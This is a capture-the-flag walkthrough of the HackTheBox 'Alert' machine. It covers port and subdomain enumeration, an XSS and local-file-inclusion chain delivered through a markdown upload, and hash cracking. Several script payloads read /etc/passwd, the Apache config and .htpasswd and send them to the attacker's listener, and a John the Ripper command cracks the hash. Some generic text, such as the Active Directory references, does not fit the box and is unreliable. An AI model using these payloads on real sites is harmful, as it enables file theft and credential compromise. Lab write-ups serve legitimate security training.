Alert HackTheBox Walkthrough

Step 1: Initial Reconnaissance and Enumeration

Performing initial reconnaissance involves gathering information about the target, such as its IP address, open ports, and server details. Enumeration is key to discovering vulnerabilities and potential entry points. Use tools like Nmap for port scanning and enumeration scripts to delve deeper. Document all findings meticulously in an md file. Remember, thorough reconnaissance lays a solid foundation for the subsequent steps in the penetration testing process. Stay methodical and detailed to set yourself up for success.

NMap Scan Result

NMap Scan Result Analysis

Open Ports:

Port 22 (SSH)

• State: Open
• Service: SSH
• Version: OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
• Notes:
  • The presence of OpenSSH suggests this service is for remote administration.
  • Version 8.2p1 has known vulnerabilities (e.g., CVE-2020-15778). Check for patch status or try SSH enumeration techniques.
  • The ssh-hostkey output provides three types of keys (RSA, ECDSA, ED25519), useful for fingerprinting or verifying authenticity during connection.

Port 80 (HTTP)

• State: Open
• Service: HTTP (Apache)
• Version: Apache httpd 2.4.41 ((Ubuntu))
• Notes:
  • The web server redirects to http://alert.htb/. This might be a virtual host; ensure the Host header is set during further exploration.
  • Version 2.4.41 may have potential vulnerabilities such as CVE-2020-11984 or CVE-2020-13950. Check patch status.
  • The redirected domain suggests a possible entry point for web exploitation or directory enumeration.

Filtered Ports:

Port 12227

Review firewall rules or routing configurations for further investigation.

• State: Filtered
• Service: Unknown
• Notes:
  • The port is filtered, meaning there is no response or it is blocked by a firewall.
  • It could host an unusual or custom service. Try techniques like udp-scan, service-fingerprint, or firewalk to gather more information.
  • Review firewall rules or routing configurations for further investigation.

Box ENUMERATION

During enumeration, I discovered two open ports: 22 and 80. Based on the room’s name, “alert,” I suspected the challenge would involve an XSS (Cross-Site Scripting) vulnerability, which appeared to be the key to solving it.

Further investigation revealed a subdomain named statistics.alert.htb during subdomain enumeration. To probe the subdomain, I used the following ffuf command:

ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w ~wordlists.txt -fc 301

On the webpage, there was an upload feature for markdown (.md) files and a preview option that rendered the content. Initially, I attempted to extract information from uploaded .md files, but those attempts didn’t yield any useful results. After experimenting with different payloads and techniques, I successfully identified and exploited an XSS vulnerability via the .md file upload feature.

Step 2: Identifying Vulnerabilities

One crucial step in conquering Alert on HackTheBox is identifying vulnerabilities. This stage involves thorough reconnaissance to pinpoint potential weak points in the system that could be exploited by an attacker, including examining the event logs and identifying domain admin accounts, as well as checking for any NTDS related anomalies. By examining the event logs, domain controllers, and open ports, you can uncover areas where security may be compromised. Utilizing various methods like analyzing source code and conducting penetration tests, you can determine the most effective approach to gaining root access. Vigilance and attention to detail are key in this phase of the process.

Step 3: Exploitation

Deploy your expertise in exploiting vulnerabilities discovered during enumeration on the webpage, including utilizing plaintext default credentials where applicable. Execute effective attacks to gain root access swiftly. Employ various methods, including different methods such as PHP payloads or XSS injections, for maximum impact. Utilize open ports on your local machine to establish a reverse shell promptly. Get a copy of the source to navigate the system adeptly and avoid falling into a rabbit hole. Elevate your skills by mastering the art of persistence and escalation to acquire necessary credentials, including learning how to work with hash values. Capture the flag by exploiting weaknesses strategically. Acquire bonus points by demonstrating proficiency in exploiting the system with John, the renowned tool for cracking passwords. Master the exploitation phase to advance successfully in Alert on HackTheBox, htb.

Hosting a Malicious Server

To exfiltrate data from the target system, I set up a Python3 HTTP server on port 8888 to capture the output of my payload.

python3 -m http.server 8888

This server acted as a listener, ready to receive any data fetched and sent by the crafted exploit.

---

Uploading a Malicious Markdown File

The payload was embedded into a .md file containing the following malicious script:

<script>
fetch("http://alert.htb/messages.php?file=filepath")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
  });
</script>

When this file was uploaded, it leveraged the application’s LFI vulnerability to fetch sensitive files and redirect their contents to my server.

---

Triggering the Payload

The uploaded .md file generated a link in the application’s UI. Hovering over this link revealed the payload’s URL, which could be copied and triggered via the application’s contact page.

As the payload executed, my Python server received Base64-encoded responses. Decoding these responses revealed sensitive files, starting with /etc/passwd, which identified two system users.

---

Expanding the Attack Surface

After identifying potential users, I attempted brute-forcing SSH credentials. However, these efforts were unsuccessful. Shifting focus, I explored Apache configuration files using adjusted payloads:

Fetching Apache Configurations

<script>
fetch("http://alert.htb/messages.php?file=../../../etc/apache2/sites-enabled/000-default.conf")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>

Extracting Apache Password Files

<script>
fetch("http://alert.htb/messages.php?file=../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>

These payloads provided critical configuration details and a hashed credential stored in .htpasswd.

---

Cracking the Apache MD5 Hash

The .htpasswd file revealed a hashed password resembling:

a****t:$****$*********$**********************/

This format, specific to Apache’s MD5 hashing, was easily cracked using John the Ripper with the popular rockyou.txt wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long alert.hash

Upon successful cracking, the plaintext password opened new doors for further exploration.

---

Key Takeaways

1. LFI and Payload Design: Combining LFI with a crafted script can enable effective exfiltration of critical files.
2. Data Harvesting: Apache configuration files often contain sensitive details, making them high-value targets in web application exploits.
3. Hash Cracking: Tools like John the Ripper, paired with robust wordlists, can efficiently decrypt common hash formats.

This process highlights the importance of securing file inclusion vulnerabilities, sanitizing user inputs, and enforcing strict access controls for sensitive files. If you’re a sysadmin or developer, implementing measures like these is vital to safeguarding your application against similar attacks.

Step 4: Flag Extraction

In the final step of conquering challenges on HackTheBox, extracting both the user flag and the root flag is essential for completing the mission. These flags serve as proof of your successful penetration and mastery of the box.

User Flag Extraction

After gaining initial access to the target system, typically through exploiting vulnerabilities, your first task is to locate the user flag. This flag is usually placed in the home directory of the user you compromised, commonly named user.txt. Use commands like cat /home/{username}/user.txt to reveal its contents. Securing the user flag is a significant milestone, marking your progression in the challenge.

Logging in as the extracted user, we get the user flag.

Root Flag Extraction

Having obtained the user flag, the next step is to escalate your privileges to root. Utilize the knowledge gained throughout your engagement, employing techniques like privilege escalation exploits or misconfigurations to gain root access. Once you are operating as the root user, locate the root flag, typically found in the root directory (/root/). The root flag is often named root.txt, and revealing its contents with cat /root/root.txt concludes your task. Collecting both flags not only demonstrates your skill in ethical hacking but also signifies the successful completion of the challenge on HackTheBox. Always remember to document your methods and findings during this process, as they are invaluable for continual learning and improvement.